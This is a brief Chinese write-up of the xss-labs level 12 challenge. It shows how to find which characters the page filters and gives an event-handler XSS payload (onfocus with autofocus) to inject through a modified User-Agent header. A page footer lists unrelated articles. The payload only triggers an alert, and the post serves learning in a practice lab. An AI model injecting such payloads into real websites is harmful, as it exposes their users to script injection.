查看一下源码,发现这里是user_agent的值,那么就和上一关思路一样,抓包修改UA值
抓包修改先看一下过滤了什么,输入
" <Script><a Href=javascript:alert()> oNload Src Data;
只过滤掉了尖括号,我们可以利用事件绕过,payload同上一关,只是这次是在UA处修改
" onfocus=alert() autofocus type="text" "
**重点:**User-Agent头传值
xss-labs pass-12
Forfun_tt2025-10-24 15:10
相关推荐
Yan.love15 分钟前
【CSS-布局】终极方案:Flexbox 与 Grid 的“降维打击”请叫我聪明鸭1 小时前
基于 marked.js 的扩展机制,创建一个自定义的块级容器扩展,让内容渲染为<div>标签而非默认的<p>标签悟能不能悟1 小时前
Gson bean getxxx,怎么才能返回给前端2501_944711431 小时前
前端向架构突围系列 - 工程化(五):企业级脚手架的设计与落地Apex Predator1 小时前
本地库导入到nexus趁着年轻吃点苦1 小时前
宝塔面板部署指南0思必得01 小时前
[Web自动化] Selenium中Select元素操作方法一叶星殇1 小时前
C# .NET 如何解决跨域(CORS)运筹vivo@1 小时前
攻防世界: catcat-new阿雄不会写代码1 小时前
Let‘s Encrypt HTTPS 证书配置指南